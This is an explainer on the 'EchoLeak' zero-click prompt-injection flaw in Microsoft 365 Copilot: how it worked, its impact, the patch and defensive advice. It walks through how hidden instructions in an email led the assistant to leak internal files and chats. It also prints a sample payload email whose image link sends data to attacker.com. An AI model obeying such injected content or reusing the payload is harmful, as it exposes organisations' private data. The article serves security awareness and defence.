Microsoft Copilot Zero-Click Vulnerability (“EchoLeak”): What Happened and Why It Matters

Overview of the Vulnerability

A critical security flaw, dubbed “EchoLeak” (CVE-2025-32711), was discovered in Microsoft 365 Copilot, the AI assistant integrated into Office apps like Word, Excel, Outlook, and Teams. This vulnerability allowed attackers to exfiltrate sensitive organizational data through a “zero-click” attack—meaning the victim did not need to interact with any malicious content for the exploit to succeed.

How the attack worked

• Attackers could initiate the exploit simply by sending a specially crafted email to a user within the target organization.
• The email contained hidden prompt injections designed to manipulate Copilot’s underlying large language model (LLM).
• Because Copilot scans emails in the background as part of its AI-driven assistance, it would process the malicious content without user interaction.
• The LLM could then be tricked into accessing and leaking sensitive data such as chat histories, OneDrive documents, SharePoint files, Teams conversations, and other proprietary information accessible to Copilot.
• The attack bypassed Copilot’s internal guardrails and protections, demonstrating a new class of vulnerabilities called “LLM Scope Violations,” where AI models are manipulated to act outside their intended permission boundaries.

The specifics of the email format and content have not been disclosed for security reasons. However, the payload could look something like this:

Subject: Onboarding Guide

Hi Team,

Please see the updated onboarding process. Let me know if you have questions.

![image](https://attacker.com/collect?data={sensitive_info})

Best,
HR

Significance and Impact

• EchoLeak is the first known zero-click attack on an AI agent, representing a major breakthrough in AI security research and highlighting the risks of integrating generative AI into enterprise environments.
• The vulnerability was present in the default configuration of Copilot, meaning most organizations using the tool were at risk until Microsoft issued a fix.
• There is no evidence that the flaw was exploited in the wild, and Microsoft has confirmed that no customers were affected.
• Microsoft addressed the issue with a server-side patch in May 2025, so no user action is required.
Broader Implications for AI Security
• EchoLeak exposes a fundamental design challenge for all LLM-based AI agents: the difficulty in distinguishing between trusted and untrusted inputs, especially as these systems become more deeply integrated into business workflows.
• Researchers warn that similar vulnerabilities could exist in other AI agents or Retrieval-Augmented Generation (RAG) applications that rely on LLMs and process untrusted inputs.
• The incident underscores the need for new security architectures and real-time guardrails specifically designed for AI applications, as traditional cybersecurity measures may not be sufficient.

Mitigation and Recommendations

• Microsoft has already patched the vulnerability, and no further action is required for customers using Microsoft 365 Copilot.

Organization advisories

• Ensure their AI systems are updated with the latest security patches.
• Monitor AI system logs for unusual command execution.
• Consider implementing additional input filtering and output post-processing for AI agents.
• Review and limit the scope of data accessible to AI systems where possible.